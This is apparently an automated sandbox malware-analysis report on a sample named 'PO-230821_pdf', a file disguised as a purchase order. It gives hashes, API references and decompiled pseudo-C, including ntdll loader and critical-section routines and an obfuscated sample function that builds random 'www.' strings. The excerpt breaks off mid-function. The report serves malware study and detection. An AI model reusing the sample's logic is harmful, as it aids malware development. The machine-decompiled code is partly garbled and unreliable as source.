                                            • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040ACD3(HMODULE* __eax, void* __edx) {
                                            				intOrPtr _t7;
                                            				void* _t10;
                                            
                                            				LdrLoadDll(0, 0, _t10 - 8, __eax); // executed
                                            				_t7 =  *((intOrPtr*)(_t10 - 0xc));
                                            				return _t7;
                                            			}





                                            0x0040ad52
                                            0x0040ad54
                                            0x0040ad5a

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 40c72b40c4354f932b92d6aae3c72639742ca39b78f111908bd011dd5e538eef
                                            • Instruction ID: 39747e9a8f671ba6cc6988212794fd546b5af8f490dd27fe5748194d64ec3937
                                            • Opcode Fuzzy Hash: 40c72b40c4354f932b92d6aae3c72639742ca39b78f111908bd011dd5e538eef
                                            • Instruction Fuzzy Hash: D9C08C30A40109BFDA50CAC8CC82FA8F3A8EB09305F0042C5F90DEB2C0D570AA508752
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: af0d0878dd8192be7041f0de1adb429b364b99b5ddcb591350c816983fd0e7be
                                            • Instruction ID: d8594460edcec1b97b0fde66fc7ad12d2dc3046d16b4cd1fe2479748c7ed9079
                                            • Opcode Fuzzy Hash: af0d0878dd8192be7041f0de1adb429b364b99b5ddcb591350c816983fd0e7be
                                            • Instruction Fuzzy Hash: 28B09B719414C5C5D715D7604A0C7177A14A7D0741F25C061D1570681E8B3CC491E276
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E00A4F4A0(signed int __ecx, signed char __edx, intOrPtr _a8, intOrPtr _a12) {
                                            				signed int _v8;
                                            				signed char _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				signed char _v72;
                                            				signed int _v76;
                                            				char _v80;
                                            				void* _v84;
                                            				char _v88;
                                            				signed int _v92;
                                            				intOrPtr _v96;
                                            				void* _v100;
                                            				signed int _v104;
                                            				char _v108;
                                            				signed char _v112;
                                            				intOrPtr _v116;
                                            				void* _v120;
                                            				signed int _v124;
                                            				signed int _v128;
                                            				char _v129;
                                            				char _v130;
                                            				intOrPtr _v132;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr _t129;
                                            				signed int _t132;
                                            				signed int _t134;
                                            				signed char* _t138;
                                            				signed char* _t139;
                                            				signed char* _t140;
                                            				void* _t142;
                                            				signed int _t144;
                                            				signed int _t145;
                                            				void* _t152;
                                            				void* _t153;
                                            				signed int _t156;
                                            				signed int _t159;
                                            				signed int _t169;
                                            				signed int _t172;
                                            				signed int _t173;
                                            				signed int _t176;
                                            				signed int _t179;
                                            				signed int* _t180;
                                            				signed int _t183;
                                            				signed int _t191;
                                            				signed char* _t192;
                                            				signed int _t198;
                                            				intOrPtr _t201;
                                            				intOrPtr _t202;
                                            				intOrPtr _t203;
                                            				void* _t206;
                                            				unsigned int _t207;
                                            				signed int _t208;
                                            				signed int _t209;
                                            				signed int _t210;
                                            				intOrPtr _t218;
                                            				intOrPtr _t220;
                                            				signed int _t223;
                                            				signed int _t226;
                                            				intOrPtr _t229;
                                            				signed int _t234;
                                            				signed int _t235;
                                            				signed int _t236;
                                            				void* _t238;
                                            				signed char _t241;
                                            				void* _t244;
                                            				signed int _t246;
                                            				intOrPtr _t247;
                                            				void* _t251;
                                            				signed int _t252;
                                            				signed int _t254;
                                            				void* _t255;
                                            				void* _t256;
                                            
                                            				_t234 = __edx;
                                            				_t209 = __ecx;
                                            				_t254 = (_t252 & 0xfffffff8) - 0x84;
                                            				_v8 =  *0xb1b370 ^ _t254;
                                            				_t129 =  *[fs:0x18];
                                            				_t241 = __ecx;
                                            				_v112 = __edx;
                                            				_v72 = __ecx;
                                            				_v129 = 0;
                                            				_v64 = _t129;
                                            				_v108 = 0;
                                            				if(__ecx == 0xb13390) {
                                            					_v129 = 1;
                                            					 *((intOrPtr*)(_t129 + 0xf84)) = 1;
                                            				}
                                            				if( *0xb15da8 != 0) {
                                            					_push(0xc000004b);
                                            					_push(0xffffffff);
                                            					L00A62C40();
                                            				}
                                            				if( *0xb15a84 == 0) {
                                            					_v120 = 0xb15a88;
                                            				} else {
                                            					_v120 = 0;
                                            				}
                                            				_t246 = _t241 + 0x10;
                                            				if( *(_t241 + 0x10) == 0) {
                                            					_t210 = _t209 | 0xffffffff;
                                            					__eflags =  *0xb14ae2;
                                            					_v124 = _t210;
                                            					if( *0xb14ae2 != 0) {
                                            						_push(0);
                                            						_push(1);
                                            						_push(0);
                                            						_push(0x100003);
                                            						_push( &_v124);
                                            						_t132 = L00A62E00();
                                            						__eflags = _t132;
                                            						if(_t132 >= 0) {
                                            							_t211 = _v124;
                                            						} else {
                                            							_t211 = _t210 | 0xffffffff;
                                            							_v124 = _t210 | 0xffffffff;
                                            						}
                                            					}
                                            					asm("lock cmpxchg [esi], ecx");
                                            					__eflags = 0;
                                            					if(0 != 0) {
                                            						_t198 = _v124;
                                            						__eflags = _t198 - 0xffffffff;
                                            						if(_t198 != 0xffffffff) {
                                            							_push(_t198);
                                            							E00A62A50();
                                            						}
                                            					}
                                            				}
                                            				_t134 =  *_t241;
                                            				if(_t134 == 0xffffffff) {
                                            					_t134 = _t134 | 0xffffffff;
                                            					__eflags =  *(_t241 + 0x14) & 0x01000000;
                                            					if(( *(_t241 + 0x14) & 0x01000000) == 0) {
                                            						_t211 = _t241;
                                            						L00A4FCB0(_t241, _t234);
                                            						_t134 =  *_t241;
                                            					}
                                            				}
                                            				_v104 = 0;
                                            				if(_t134 != 0xffffffff) {
                                            					 *((intOrPtr*)(_t134 + 0x14)) =  *((intOrPtr*)(_t134 + 0x14)) + 1;
                                            				}
                                            				_t201 =  *_t246;
                                            				_v68 = _t201;
                                            				L9:
                                            				while(1) {
                                            					L9:
                                            					if(L00A33BF0() != 0) {
                                            						_t138 = ( *[fs:0x30])[0x50] + 0x228;
                                            					} else {
                                            						_t138 = 0x7ffe0382;
                                            					}
                                            					if( *_t138 != 0) {
                                            						_t139 =  *[fs:0x30];
                                            						__eflags = _t139[0x240] & 0x00000002;
                                            						if((_t139[0x240] & 0x00000002) != 0) {
                                            							_v16 = _t241;
                                            							_v54 = 0x1722;
                                            							_v24 =  *(_t241 + 0x14) & 0x00ffffff;
                                            							_v28 =  *(_t241 + 4);
                                            							_v20 =  *((intOrPtr*)(_t241 + 0xc));
                                            							_t191 = ( *[fs:0x30])[0x50];
                                            							__eflags = _t191;
                                            							if(_t191 == 0) {
                                            								L61:
                                            								_t192 = 0x7ffe0382;
                                            							} else {
                                            								__eflags =  *_t191;
                                            								if( *_t191 == 0) {
                                            									goto L61;
                                            								} else {
                                            									_t192 = ( *[fs:0x30])[0x50] + 0x228;
                                            								}
                                            							}
                                            							_t211 =  &_v60;
                                            							_push( &_v60);
                                            							_push(0x10);
                                            							_push(0x20402);
                                            							_push( *_t192 & 0x000000ff);
                                            							L00A62F60();
                                            						}
                                            						goto L12;
                                            						L24:
                                            						if(_t140 < 0) {
                                            							L00A78980(_t211, _t234, _t140);
                                            							asm("int3");
                                            							__eflags = _t246 != 4;
                                            							if(_t246 != 4) {
                                            								L47:
                                            								L00A4F916(_v132,  &_v124);
                                            								_t152 = 0;
                                            							} else {
                                            								_t238 =  *(_t241 + 4);
                                            								_t153 =  *_t241;
                                            								asm("lock cmpxchg8b [esi]");
                                            								__eflags = _t153 -  *_t241;
                                            								if(_t153 !=  *_t241) {
                                            									goto L47;
                                            								} else {
                                            									__eflags = _t238 -  *(_t241 + 4);
                                            									if(__eflags != 0) {
                                            										goto L47;
                                            									} else {
                                            										_t152 = L00A4F875(_v132,  &_v124, _a8, _a12);
                                            									}
                                            								}
                                            							}
                                            							return _t152;
                                            						} else {
                                            							if(_v129 != 0) {
                                            								 *((intOrPtr*)(_v64 + 0xf84)) = 0;
                                            								_t156 = ( *[fs:0x30])[0x50];
                                            								__eflags = _t156;
                                            								if(_t156 == 0) {
                                            									L81:
                                            									_t140 = 0x7ffe0384;
                                            								} else {
                                            									__eflags =  *_t156;
                                            									if( *_t156 == 0) {
                                            										goto L81;
                                            									} else {
                                            										_t140 = ( *[fs:0x30])[0x50] + 0x22a;
                                            									}
                                            								}
                                            								__eflags =  *_t140;
                                            								if( *_t140 != 0) {
                                            									_t140 =  *[fs:0x30];
                                            									__eflags = _t140[0x240] & 0x00000004;
                                            									if((_t140[0x240] & 0x00000004) != 0) {
                                            										_t159 = ( *[fs:0x30])[0x50];
                                            										__eflags = _t159;
                                            										if(_t159 == 0) {
                                            											L87:
                                            											_t140 = 0x7ffe0385;
                                            										} else {
                                            											__eflags =  *_t159;
                                            											if( *_t159 == 0) {
                                            												goto L87;
                                            											} else {
                                            												_t140 = ( *[fs:0x30])[0x50] + 0x22b;
                                            											}
                                            										}
                                            										__eflags =  *_t140 & 0x00000020;
                                            										if(( *_t140 & 0x00000020) != 0) {
                                            											_t140 = E00AA0117(0x1483, _t234, 0xffffffff, 0xffffffff, 0, 0);
                                            										}
                                            									}
                                            								}
                                            							}
                                            							_pop(_t244);
                                            							_pop(_t251);
                                            							_pop(_t206);
                                            							return L00A64B20(_t140, _t206, _v8 ^ _t254, _t234, _t244, _t251);
                                            						}
                                            					}
                                            					L12:
                                            					if(_t201 != 0xffffffff) {
                                            						_push(_v120);
                                            						_push(0);
                                            						_push(_t201);
                                            						_t140 = L00A629A0();
                                            					} else {
                                            						_t207 = _t241 + 4;
                                            						_v76 =  &_v100 & 0xfffffffc;
                                            						do {
                                            							_t218 =  *[fs:0x18];
                                            							_v100 = _t207;
                                            							_v80 = 1;
                                            							_v88 = 0;
                                            							_v92 = 0;
                                            							_v84 = 0;
                                            							_v96 =  *((intOrPtr*)(_t218 + 0x24));
                                            							_t208 = _v76;
                                            							_t220 =  *((intOrPtr*)(_t218 + 0x30)) + 0x25c;
                                            							_t169 = _t207 >> 0x00000005 & 0x0000007f;
                                            							_v116 = _t220;
                                            							_t235 =  *(_t220 + _t169 * 4);
                                            							_v128 = _t220 + _t169 * 4;
                                            							while(1) {
                                            								_t172 = _t235 & 0xfffffffc;
                                            								_t223 = _t235 & 0x00000003 | _t208;
                                            								_v92 = _t172;
                                            								if(_t172 != 0) {
                                            									_v84 = 0;
                                            									_t223 = _t223 | 0x00000002;
                                            								} else {
                                            									_v84 =  &_v100;
                                            								}
                                            								_t246 = _t223;
                                            								_t173 = _t235;
                                            								asm("lock cmpxchg [edi], esi");
                                            								if(_t173 == _t235) {
                                            									break;
                                            								}
                                            								_t235 = _t173;
                                            							}
                                            							_t241 = _v72;
                                            							_t207 = _t241 + 4;
                                            							if(((_t223 ^ _t235) & 0x00000002) != 0) {
                                            								_t246 = _v128;
                                            								_t236 =  *_t246;
                                            								while(1) {
                                            									_t226 = _t236 & 0xfffffffc;
                                            									__eflags =  *(_t226 + 0x10);
                                            									_v128 = _t226 + 0x10;
                                            									if( *(_t226 + 0x10) == 0) {
                                            										goto L31;
                                            									}
                                            									do {
                                            										L31:
                                            										_t183 = _t226;
                                            										_t226 =  *(_t226 + 8);
                                            										 *(_t226 + 0xc) = _t183;
                                            										__eflags =  *(_t226 + 0x10);
                                            									} while ( *(_t226 + 0x10) == 0);
                                            									L32:
                                            									 *_v128 =  *(_t226 + 0x10);
                                            									__eflags = _t236 & 0x00000001;
                                            									if((_t236 & 0x00000001) != 0) {
                                            										_v130 = 1;
                                            									} else {
                                            										_v130 = 0;
                                            										__eflags = _t236 & 0xfffffffc;
                                            									}
                                            									_t176 = _t236;
                                            									asm("lock cmpxchg [esi], ecx");
                                            									__eflags = _t176 - _t236;
                                            									if(_t176 != _t236) {
                                            										_t236 = _t176;
                                            										_t226 = _t236 & 0xfffffffc;
                                            										__eflags =  *(_t226 + 0x10);
                                            										_v128 = _t226 + 0x10;
                                            										if( *(_t226 + 0x10) == 0) {
                                            											goto L31;
                                            										}
                                            										goto L32;
                                            									}
                                            									__eflags = _v130;
                                            									if(_v130 != 0) {
                                            										_t179 = _t176 & 0xfffffffc;
                                            										__eflags = _t179;
                                            										_v128 = _t179;
                                            										if(_t179 != 0) {
                                            											do {
                                            												_t246 =  *(_t179 + 8);
                                            												_t180 = _t179 + 0x14;
                                            												 *_t180 = 2;
                                            												__eflags =  *_t180;
                                            												if( *_t180 == 0) {
                                            													_push( *((intOrPtr*)(_v128 + 4)));
                                            													E00A63080();
                                            												}
                                            												_t179 = _t246;
                                            												_v128 = _t179;
                                            												__eflags = _t246;
                                            											} while (_t246 != 0);
                                            										}
                                            									}
                                            									goto L19;
                                            								}
                                            							}
                                            							L19:
                                            							_t234 =  &_v100;
                                            							_t229 = _v116;
                                            							if( *_t207 != _v112) {
                                            								L00A4F916(_t229, _t234);
                                            								_t140 = 0;
                                            							} else {
                                            								_t140 = L00A4F875(_t229, _t234, _v120, 0);
                                            							}
                                            							if(_t140 == 0x102) {
                                            								L70:
                                            								_t202 = _v108;
                                            								_t247 =  *[fs:0x18];
                                            								_push(_t202);
                                            								_t142 = E00A66300( *_v120,  *((intOrPtr*)(_v120 + 4)), 0xff676980, 0xffffffff);
                                            								_push(_t234);
                                            								L00AAEE00(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t142);
                                            								_t144 =  *_t241;
                                            								_t255 = _t254 + 0x18;
                                            								__eflags = _t144 - 0xffffffff;
                                            								if(_t144 == 0xffffffff) {
                                            									_t145 = 0;
                                            									__eflags = 0;
                                            								} else {
                                            									_t145 =  *((intOrPtr*)(_t144 + 0x14));
                                            								}
                                            								_push(_t145);
                                            								_push(_t241);
                                            								_push( *((intOrPtr*)(_t241 + 0xc)));
                                            								_push( *((intOrPtr*)(_t247 + 0x24)));
                                            								L00AAEE00(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t247 + 0x20)));
                                            								_t256 = _t255 + 0x20;
                                            								_t203 = _t202 + 1;
                                            								_t211 = _t241;
                                            								_v108 = _t203;
                                            								_t246 = L00ABA7EE(_t241);
                                            								__eflags = _t203 - 2;
                                            								if(_t203 > 2) {
                                            									__eflags = _t241 - 0xb13390;
                                            									if(_t241 != 0xb13390) {
                                            										__eflags = _t246 - _v104;
                                            										if(_t246 == _v104) {
                                            											L00ABA99E(_t211);
                                            										}
                                            									}
                                            								}
                                            								_push("RTL: Re-Waiting\n");
                                            								_push(0);
                                            								_push(0x65);
                                            								_v104 = _t246;
                                            								L00AAEE00();
                                            								_t201 = _v68;
                                            								_t254 = _t256 + 0xc;
                                            								goto L9;
                                            							} else {
                                            								goto L22;
                                            							}
                                            							goto L23;
                                            							L22:
                                            							_t211 =  *_t207;
                                            							_v112 = _t211;
                                            						} while ((_t211 & 0x00000002) != 0);
                                            					}
                                            					L23:
                                            					if(_t140 == 0x102) {
                                            						goto L70;
                                            					}
                                            					goto L24;
                                            				}
                                            			}



















































































                                            0x00a4f4a0
                                            0x00a4f4a0
                                            0x00a4f4a8
                                            0x00a4f4b5
                                            0x00a4f4bc
                                            0x00a4f4c5
                                            0x00a4f4c7
                                            0x00a4f4cb
                                            0x00a4f4cf
                                            0x00a4f4d4
                                            0x00a4f4d8
                                            0x00a4f4e6
                                            0x00a8fe26
                                            0x00a8fe2b
                                            0x00a8fe2b
                                            0x00a4f4f3
                                            0x00a8fe3a
                                            0x00a8fe3f
                                            0x00a8fe41
                                            0x00a8fe41
                                            0x00a4f500
                                            0x00a8fe4b
                                            0x00a4f506
                                            0x00a4f506
                                            0x00a4f506
                                            0x00a4f512
                                            0x00a4f515
                                            0x00a4f6f2
                                            0x00a4f6f5
                                            0x00a4f6fc
                                            0x00a4f700
                                            0x00a8fe58
                                            0x00a8fe5a
                                            0x00a8fe5c
                                            0x00a8fe5e
                                            0x00a8fe67
                                            0x00a8fe68
                                            0x00a8fe6d
                                            0x00a8fe6f
                                            0x00a8fe7d
                                            0x00a8fe71
                                            0x00a8fe71
                                            0x00a8fe74
                                            0x00a8fe74
                                            0x00a8fe6f
                                            0x00a4f708
                                            0x00a4f70c
                                            0x00a4f70e
                                            0x00a8fe86
                                            0x00a8fe8a
                                            0x00a8fe8d
                                            0x00a8fe93
                                            0x00a8fe94
                                            0x00a8fe94
                                            0x00a8fe8d
                                            0x00a4f70e
                                            0x00a4f51b
                                            0x00a4f520
                                            0x00a4f719
                                            0x00a4f71c
                                            0x00a4f723
                                            0x00a4f729
                                            0x00a4f72b
                                            0x00a4f730
                                            0x00a4f730
                                            0x00a4f723
                                            0x00a4f526
                                            0x00a4f531
                                            0x00a4f533
                                            0x00a4f533
                                            0x00a4f536
                                            0x00a4f538
                                            0x00000000
                                            0x00a4f540
                                            0x00a4f540
                                            0x00a4f547
                                            0x00a8fea7
                                            0x00a4f54d
                                            0x00a4f54d
                                            0x00a4f54d
                                            0x00a4f555
                                            0x00a8feb1
                                            0x00a8feb7
                                            0x00a8febe
                                            0x00a8fec9
                                            0x00a8fed0
                                            0x00a8fedd
                                            0x00a8fee4
                                            0x00a8feeb
                                            0x00a8fef8
                                            0x00a8fefb
                                            0x00a8fefd
                                            0x00a8ff14
                                            0x00a8ff14
                                            0x00a8feff
                                            0x00a8feff
                                            0x00a8ff02
                                            0x00000000
                                            0x00a8ff04
                                            0x00a8ff0d
                                            0x00a8ff0d
                                            0x00a8ff02
                                            0x00a8ff1c
                                            0x00a8ff20
                                            0x00a8ff21
                                            0x00a8ff23
                                            0x00a8ff28
                                            0x00a8ff29
                                            0x00a8ff29
                                            0x00000000
                                            0x00a4f652
                                            0x00a4f654
                                            0x00a900c2
                                            0x00a900c7
                                            0x00a900c8
                                            0x00a900cb
                                            0x00a4f7f5
                                            0x00a4f7fd
                                            0x00a4f802
                                            0x00a900d1
                                            0x00a900d4
                                            0x00a900d6
                                            0x00a900df
                                            0x00a900e3
                                            0x00a900e5
                                            0x00000000
                                            0x00a900eb
                                            0x00a900eb
                                            0x00a4f7d7
                                            0x00000000
                                            0x00a4f7d9
                                            0x00a4f7e7
                                            0x00a4f7e7
                                            0x00a4f7d7
                                            0x00a900e5
                                            0x00a4f7f2
                                            0x00a4f65a
                                            0x00a4f65f
                                            0x00a9002a
                                            0x00a9003a
                                            0x00a9003d
                                            0x00a9003f
                                            0x00a90056
                                            0x00a90056
                                            0x00a90041
                                            0x00a90041
                                            0x00a90044
                                            0x00000000
                                            0x00a90046
                                            0x00a9004f
                                            0x00a9004f
                                            0x00a90044
                                            0x00a9005b
                                            0x00a9005e
                                            0x00a90064
                                            0x00a9006a
                                            0x00a90071
                                            0x00a9007d
                                            0x00a90080
                                            0x00a90082
                                            0x00a90099
                                            0x00a90099
                                            0x00a90084
                                            0x00a90084
                                            0x00a90087
                                            0x00000000
                                            0x00a90089
                                            0x00a90092
                                            0x00a90092
                                            0x00a90087
                                            0x00a9009e
                                            0x00a900a1
                                            0x00a900b7
                                            0x00a900b7
                                            0x00a900a1
                                            0x00a90071
                                            0x00a9005e
                                            0x00a4f66c
                                            0x00a4f66d
                                            0x00a4f66e
                                            0x00a4f679
                                            0x00a4f679
                                            0x00a4f654
                                            0x00a4f55b
                                            0x00a4f55e
                                            0x00a8ff73
                                            0x00a8ff77
                                            0x00a8ff79
                                            0x00a8ff7a
                                            0x00a4f564
                                            0x00a4f56b
                                            0x00a4f56e
                                            0x00a4f572
                                            0x00a4f572
                                            0x00a4f579
                                            0x00a4f57d
                                            0x00a4f585
                                            0x00a4f58d
                                            0x00a4f595
                                            0x00a4f5a0
                                            0x00a4f5a9
                                            0x00a4f5ad
                                            0x00a4f5b6
                                            0x00a4f5b9
                                            0x00a4f5bd
                                            0x00a4f5c3
                                            0x00a4f5d0
                                            0x00a4f5d7
                                            0x00a4f5da
                                            0x00a4f5dc
                                            0x00a4f5e2
                                            0x00a4f683
                                            0x00a4f68b
                                            0x00a4f5e8
                                            0x00a4f5ec
                                            0x00a4f5ec
                                            0x00a4f5f0
                                            0x00a4f5f2
                                            0x00a4f5f4
                                            0x00a4f5fa
                                            0x00000000
                                            0x00000000
                                            0x00a8ff33
                                            0x00a8ff33
                                            0x00a4f600
                                            0x00a4f606
                                            0x00a4f60c
                                            0x00a4f693
                                            0x00a4f697
                                            0x00a4f6a0
                                            0x00a4f6a2
                                            0x00a4f6a5
                                            0x00a4f6ac
                                            0x00a4f6b0
                                            0x00000000
                                            0x00000000
                                            0x00a4f6b2
                                            0x00a4f6b2
                                            0x00a4f6b2
                                            0x00a4f6b4
                                            0x00a4f6b7
                                            0x00a4f6ba
                                            0x00a4f6ba
                                            0x00a4f6c0
                                            0x00a4f6c7
                                            0x00a4f6c9
                                            0x00a4f6cc
                                            0x00a4f737
                                            0x00a4f6ce
                                            0x00a4f6d0
                                            0x00a4f6d5
                                            0x00a4f6d5
                                            0x00a4f6d8
                                            0x00a4f6da
                                            0x00a4f6de
                                            0x00a4f6e0
                                            0x00a4f740
                                            0x00a4f6a2
                                            0x00a4f6a5
                                            0x00a4f6ac
                                            0x00a4f6b0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00a4f6b0
                                            0x00a4f6e2
                                            0x00a4f6e7
                                            0x00a8ff3a
                                            0x00a8ff3a
                                            0x00a8ff3d
                                            0x00a8ff41
                                            0x00a8ff47
                                            0x00a8ff47
                                            0x00a8ff4f
                                            0x00a8ff52
                                            0x00a8ff54
                                            0x00a8ff56
                                            0x00a8ff5c
                                            0x00a8ff5f
                                            0x00a8ff5f
                                            0x00a8ff64
                                            0x00a8ff66
                                            0x00a8ff6a
                                            0x00a8ff6a
                                            0x00a8ff6e
                                            0x00a8ff41
                                            0x00000000
                                            0x00a4f6e7
                                            0x00a4f6a0
                                            0x00a4f612
                                            0x00a4f614
                                            0x00a4f618
                                            0x00a4f620
                                            0x00a4f67a
                                            0x00a4f67f
                                            0x00a4f622
                                            0x00a4f628
                                            0x00a4f628
                                            0x00a4f632
                                            0x00a8ff84
                                            0x00a8ff84
                                            0x00a8ff8c
                                            0x00a8ff93
                                            0x00a8ffa0
                                            0x00a8ffa5
                                            0x00a8ffb0
                                            0x00a8ffb5
                                            0x00a8ffb7
                                            0x00a8ffba
                                            0x00a8ffbd
                                            0x00a8ffc4
                                            0x00a8ffc4
                                            0x00a8ffbf
                                            0x00a8ffbf
                                            0x00a8ffbf
                                            0x00a8ffc6
                                            0x00a8ffc7
                                            0x00a8ffc8
                                            0x00a8ffcb
                                            0x00a8ffda
                                            0x00a8ffdf
                                            0x00a8ffe2
                                            0x00a8ffe3
                                            0x00a8ffe5
                                            0x00a8ffee
                                            0x00a8fff0
                                            0x00a8fff3
                                            0x00a8fff5
                                            0x00a8fffb
                                            0x00a8fffd
                                            0x00a90001
                                            0x00a90003
                                            0x00a90003
                                            0x00a90001
                                            0x00a8fffb
                                            0x00a90008
                                            0x00a9000d
                                            0x00a9000f
                                            0x00a90011
                                            0x00a90015
                                            0x00a9001a
                                            0x00a9001e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00a4f638
                                            0x00a4f638
                                            0x00a4f63a
                                            0x00a4f63e
                                            0x00a4f572
                                            0x00a4f647
                                            0x00a4f64c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00a4f64c

                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A8FFD1
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A8FFA7
                                            • RTL: Re-Waiting, xrefs: 00A90008
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 21b5d865bd034c40bc1aa9828a305e1825bec53469c6e7d3a30f8ed63818391c
                                            • Instruction ID: e64f654ed9018037c40037cf8e25dfd90c3c58fb9c9a041b43237411d5509138
                                            • Opcode Fuzzy Hash: 21b5d865bd034c40bc1aa9828a305e1825bec53469c6e7d3a30f8ed63818391c
                                            • Instruction Fuzzy Hash: A9E1BB356087829FDB25CF28C985B2AB7F0BB85324F240A2DF5A58B2E1D774DD44CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 70%
                                            			E00417D59(signed int __eax, void* __ebx, signed int __ecx, void* __edx, void* __esi) {
                                            				void* __edi;
                                            				signed int _t133;
                                            				char _t136;
                                            				void* _t146;
                                            				signed int _t151;
                                            				intOrPtr _t166;
                                            				intOrPtr _t208;
                                            				signed int _t212;
                                            				void* _t265;
                                            				signed int _t269;
                                            				intOrPtr _t270;
                                            				signed int _t272;
                                            				void* _t273;
                                            				void* _t275;
                                            				void* _t276;
                                            				void* _t278;
                                            				void* _t279;
                                            				void* _t282;
                                            
                                            				_t133 = __eax;
                                            				asm("das");
                                            				 *0x670b5c3d = __eax;
                                            				0x6eade830();
                                            				 *(__eax + __ebx) =  *(__eax + __ebx) ^ __ecx;
                                            				 *(__edx + 0x6a) =  *(__edx + 0x6a) ^ _t272;
                                            				asm("popad");
                                            				asm("aas");
                                            				asm("adc ecx, [edx]");
                                            				_t273 = _t272 - 1;
                                            				if(_t273 >= 0) {
                                            					__eflags = __eax & 0xc650006a;
                                            					_t275 = _t273 + 2;
                                            					__eflags = __eax & 0x00000000;
                                            					E0041BE50();
                                            					__eflags = 0;
                                            					_t279 = _t278 + 0xc;
                                            					 *((char*)(_t275 - 0x10)) = 0;
                                            					 *((intOrPtr*)(_t275 - 0xf)) = 0;
                                            					goto L8;
                                            				} else {
                                            					__eax =  *0xd0989e02;
                                            					if(__eflags >= 0) {
                                            						L8:
                                            						 *((short*)(_t275 - 0xb)) = 0;
                                            						goto L9;
                                            					} else {
                                            						__eflags = __cl - __ah;
                                            						asm("lodsd");
                                            						__eflags = __ch;
                                            						__ebx = __ebx - 1;
                                            						_t5 = __eax;
                                            						__eax = __ebp;
                                            						__ebp = _t5;
                                            						__ecx = __edi;
                                            						asm("outsd");
                                            						__esp = __esp + 1;
                                            						__esp = __esp |  *(__edi + 0x258c24c4);
                                            						__eflags = __esp;
                                            						ss =  *((intOrPtr*)(__eax - 0x568099b));
                                            						if(__eflags <= 0) {
                                            							L9:
                                            							_t276 = _t275 + 1;
                                            							asm("cmc");
                                            							 *((char*)(_t276 - 9)) = 0;
                                            							_t269 = 0;
                                            							__eflags = 0;
                                            							do {
                                            								_t136 = E0040A470(__eflags, 0x4e, 0x8d);
                                            								_t279 = _t279 + 8;
                                            								_t212 = 0;
                                            								__eflags = 0;
                                            								while(1) {
                                            									__eflags = _t136 -  *((intOrPtr*)(_t276 + _t212 - 0x10));
                                            									if(_t136 ==  *((intOrPtr*)(_t276 + _t212 - 0x10))) {
                                            										goto L16;
                                            									}
                                            									_t212 = _t212 + 1;
                                            									__eflags = _t212 - _t269;
                                            									if(_t212 <= _t269) {
                                            										continue;
                                            									} else {
                                            										__eflags = _t136;
                                            										if(_t136 != 0) {
                                            											 *((char*)(_t276 + _t269 - 0x10)) = _t136;
                                            											_t269 = _t269 + 1;
                                            											__eflags = _t269;
                                            										}
                                            									}
                                            									goto L16;
                                            								}
                                            								L16:
                                            								__eflags = _t269 - 8;
                                            							} while (__eflags < 0);
                                            							 *((intOrPtr*)(_t276 - 8)) = 0x2e777777;
                                            							 *((char*)(_t276 - 4)) = 0;
                                            							 *((short*)(_t276 - 3)) = 0;
                                            							 *((char*)(_t276 - 1)) = 0;
                                            							 *((char*)(_t276 - 0x98)) = 0;
                                            							E0041BE50(_t276 - 0x97, 0, 0x3f);
                                            							_push(E0040A470(__eflags, 2, 5) & 0x000000ff);
                                            							_push(_t276 - 0x98);
                                            							E0041C700();
                                            							 *((char*)(_t276 + E0041C0A0(_t276 - 0x98) - 0x98)) = 0x3d;
                                            							_push(E0040A470(__eflags, 4, 0x10) & 0x000000ff);
                                            							_push(_t276 + E0041C0A0(_t276 - 0x98) - 0x98);
                                            							_t146 = E0041C700();
                                            							_t34 = _t276 + 8; // 0x2e777777
                                            							_t270 =  *_t34;
                                            							_t208 = 0;
